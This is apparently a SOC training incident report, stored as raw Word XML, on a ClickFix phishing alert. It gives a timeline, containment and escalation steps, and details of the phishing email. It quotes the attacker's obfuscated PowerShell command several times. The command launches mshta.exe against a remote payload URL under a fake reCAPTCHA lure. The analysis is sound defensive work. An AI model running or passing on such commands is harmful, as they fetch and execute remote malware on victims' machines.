          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on March 13, 2025 at 23:26:08.  </w:t>
      </w:r>
      <w:r w:rsidR="0054120A" w:rsidRPr="0054120A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User clicked </w:t>
      </w:r>
      <w:r w:rsidR="00C40035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0054120A" w:rsidRPr="0054120A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> link</w:t>
      </w:r>
      <w:r w:rsidR="00C40035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> which then</w:t>
      </w:r>
      <w:r w:rsidR="0054120A" w:rsidRPr="0054120A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> presented a fake reCAPTCHA verification page. Approximately 10 seconds later</w:t>
      </w:r>
      <w:r w:rsidR="00C40035">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003B11A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>23:26:19)</w:t>
      </w:r>
      <w:r w:rsidR="0054120A" w:rsidRPr="0054120A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, PowerShell executed an obfuscated command that reconstructed and launched mshta.exe against a remote URL. The command included language commonly associated with ClickFix phishing campaigns ("I am not a robot - reCAPTCHA Verification"). This activity is consistent with a ClickFix social-engineering attack leading to execution of a remote payload via MSHTA.</w:t>
      </w:r>
      <w:r w:rsidR="002F053F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F053F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Overall summary:</w:t>
      </w:r>
      <w:r w:rsidR="002F053F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002F053F" w:rsidRPr="002F053F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User interaction with a malicious phishing page resulted in execution of an obfuscated PowerShell command. The command reconstructed and launched mshta.exe against a remote URL hosted on overcoatpassably.shop. The command included text mimicking a CAPTCHA verification prompt, a known characteristic of ClickFix phishing campaigns. Activity occurred within seconds of the user accessing the malicious site and is consistent with successful user-driven malware execution through PowerShell and MSHTA.</w:t>
      </w:r>
      <w:r w:rsidR="006C078A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C078A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Timeline:</w:t>
      </w:r>
      <w:r w:rsidR="006C078A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C078A" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13-Mar-2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756744D" w14:textId="6B5A2FD8" w:rsidR="006C078A" w:rsidRPr="0077717E" w:rsidRDefault="006C078A" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>23:26:08 link clicked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47250D96" w14:textId="5BA92DA3" w:rsidR="006C078A" w:rsidRPr="0077717E" w:rsidRDefault="006C078A" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">23:26:19 </w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell executes:</w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']') # </w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ''I am not a robot - reCAPTCHA Verification ID: 3824''</w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>23:26:31</w:t>
      </w:r>
      <w:r w:rsidR="00783997" w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> powershell executes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B2DE4" w14:textId="5E3479DB" w:rsidR="00783997" w:rsidRPr="0077717E" w:rsidRDefault="00783997" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FD9FD" w14:textId="4C5FF1D4" w:rsidR="00783997" w:rsidRPr="0077717E" w:rsidRDefault="0077717E" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>23:26:32</w:t>
      </w:r>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> powershell executes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C35D1" w14:textId="727A55F2" w:rsidR="0077717E" w:rsidRPr="0077717E" w:rsidRDefault="0077717E" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']') # </w:t>
      </w:r>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="0077717E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ''I am not a robot - reCAPTCHA Verification ID: 3824''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76220AF9" w14:textId="7AB8AE9F" w:rsidR="00BE0DA2" w:rsidRDefault="00BE0DA2" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E41E164" w14:textId="0BC7BD5A" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E91287" w14:textId="258ECA6A" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Since it is detected that the device is compromised, the device must be isolated in order to restrict the attacker, prevent the spread of the attack and reduce the impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108079BF" w14:textId="30789C30" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Go to the Endpoint Security page and contain the relevant device with the help of the "Request Containment" button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9C452" w14:textId="4426B85C" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Do You Need Tier 2 Escalation?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A4543" w14:textId="67027DD1" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tier 2 escalation should be performed in the following situations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8000CB" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In cases where the attack succeeds,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AB4356" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When the attacker compromises a device in the internal network (in cases where the direction of harmful traffic is from inside → inside),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685784ED" w14:textId="1C145EFB" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tier 2 escalation is not required in the following cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49373F5F" w14:textId="00936173" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In cases where attacks from the Internet do not succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C25BC4" w14:textId="5DDA80BE" w:rsidR="0014049D" w:rsidRDefault="0014049D" w:rsidP="0014049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T2 escalation not required.  </w:t>
      </w:r>
      <w:r w:rsidR="004A44E6" w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL that attempted to pull malicious files/scripts appears to be offline.  All attempts to curl</w:t>
      </w:r>
      <w:r w:rsidR="001435E5" w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D25953" w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4</w:t>
      </w:r>
      <w:r w:rsidR="00D25953" w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> have failed.  No </w:t>
      </w:r>
      <w:r w:rsidR="001435E5" w:rsidRPr="001435E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">further process logs support further execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1B7E4" w14:textId="77777777" w:rsidR="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="0014049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DDA218" w14:textId="6E694150" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When was it sent?</w:t>
      </w:r>
      <w:r w:rsidR="004C0611">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000E564D" w:rsidRPr="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mar 13, 2025, 09:44 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA0303B" w14:textId="090215D1" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the email's SMTP address?</w:t>
      </w:r>
      <w:r w:rsidR="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000E564D" w:rsidRPr="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>132.232.40.201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62674C81" w14:textId="4DB344F2" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the sender address?</w:t>
      </w:r>
      <w:r w:rsidR="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000E564D" w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>update@windows-update.site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEE17B" w14:textId="3A1594AE" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the recipient address?</w:t>
      </w:r>
      <w:r w:rsidR="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000E564D" w:rsidRPr="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dylan@letsdefend.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D05BF" w14:textId="65C6B1EC" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Is the mail content suspicious?</w:t>
      </w:r>
      <w:r w:rsidR="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E256F6" w14:textId="13DCC4DD" w:rsidR="00F0131A" w:rsidRPr="00F0131A" w:rsidRDefault="00F0131A" w:rsidP="00F0131A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0131A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Are there any attachment?</w:t>
      </w:r>
      <w:r w:rsidR="000E564D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B25DD" w14:textId="77777777" w:rsidR="00F0131A" w:rsidRPr="001435E5" w:rsidRDefault="00F0131A" w:rsidP="0014049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3724B8" w14:textId="77777777" w:rsidR="00B5572D" w:rsidRDefault="00B5572D" w:rsidP="00B5572D"/>
    <w:p w14:paraId="25661A80" w14:textId="77777777" w:rsidR="00B5572D" w:rsidRDefault="00B5572D" w:rsidP="00B5572D"/>
    <w:p w14:paraId="5AD91252" w14:textId="552A64B8" w:rsidR="00B5572D" w:rsidRDefault="00B5572D" w:rsidP="00B5572D">
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C1B06" w14:textId="77777777" w:rsidR="00B5572D" w:rsidRDefault="00B5572D" w:rsidP="00B5572D"/>
    <w:sectPr w:rsidR="00B557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E7945"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E2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5537C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92846A12"/>
    <w:lvl w:ilvl="0" w:tplc="0409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CFB4C28C">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611106">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="180939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8D"/>
    <w:rsid w:val="000672FD"/>
    <w:rsid w:val="0007647A"/>
    <w:rsid w:val="000E564D"/>
    <w:rsid w:val="0014049D"/>
    <w:rsid w:val="001435E5"/>
    <w:rsid w:val="001A5838"/>
    <w:rsid w:val="001D219A"/>
    <w:rsid w:val="002F053F"/>
    <w:rsid w:val="00397436"/>
    <w:rsid w:val="003B11A1"/>
    <w:rsid w:val="004334B5"/>
    <w:rsid w:val="00464925"/>
    <w:rsid w:val="004866BF"/>
    <w:rsid w:val="004A44E6"/>
    <w:rsid w:val="004C0611"/>
    <w:rsid w:val="004C4EBD"/>
    <w:rsid w:val="004E22E1"/>
    <w:rsid w:val="004E4106"/>
    <w:rsid w:val="0054120A"/>
    <w:rsid w:val="00573E62"/>
    <w:rsid w:val="005B048D"/>
    <w:rsid w:val="00690D37"/>
    <w:rsid w:val="006C078A"/>
    <w:rsid w:val="00731FA1"/>
    <w:rsid w:val="00746913"/>
    <w:rsid w:val="00753555"/>
    <w:rsid w:val="0077717E"/>
    <w:rsid w:val="00783997"/>
    <w:rsid w:val="007B7941"/>
    <w:rsid w:val="008013F4"/>
    <w:rsid w:val="00926BC4"/>
    <w:rsid w:val="00953119"/>
    <w:rsid w:val="00A911D9"/>
    <w:rsid w:val="00AB2D0B"/>
    <w:rsid w:val="00B5572D"/>
    <w:rsid w:val="00BA6292"/>
    <w:rsid w:val="00BB5EE3"/>
    <w:rsid w:val="00BD045C"/>
    <w:rsid w:val="00BE0DA2"/>
    <w:rsid w:val="00C40035"/>
    <w:rsid w:val="00C4041C"/>
    <w:rsid w:val="00D25953"/>
    <w:rsid w:val="00D31C41"/>
    <w:rsid w:val="00D9473A"/>
    <w:rsid w:val="00DF5EC2"/>
    <w:rsid w:val="00E26087"/>
    <w:rsid w:val="00ED3986"/>
    <w:rsid w:val="00F0131A"/>
    <w:rsid w:val="00F04C3C"/>
    <w:rsid w:val="00F46CD4"/>
    <w:rsid w:val="00F57BB2"/>
    <w:rsid w:val="00F62F2C"/>
    <w:rsid w:val="00F82F5F"/>
    <w:rsid w:val="00F9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E177"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4BD6299E-49C9-4A26-B40A-2B4B0919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0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0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48D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005B0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48D"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="005B048D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005B048D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005B048D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005B0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48D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005B048D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B048D"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005B048D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00397436"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C07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letsdefend.io/training/lessons/web-attacks-101" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://talosintelligenc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buseipdb.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/home/up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1105</Words>
  <Characters>5817</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>153</Lines>
  <Paragraphs>98</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DeAngelis</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chris DeAngelis</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-17T18:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-18T18:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>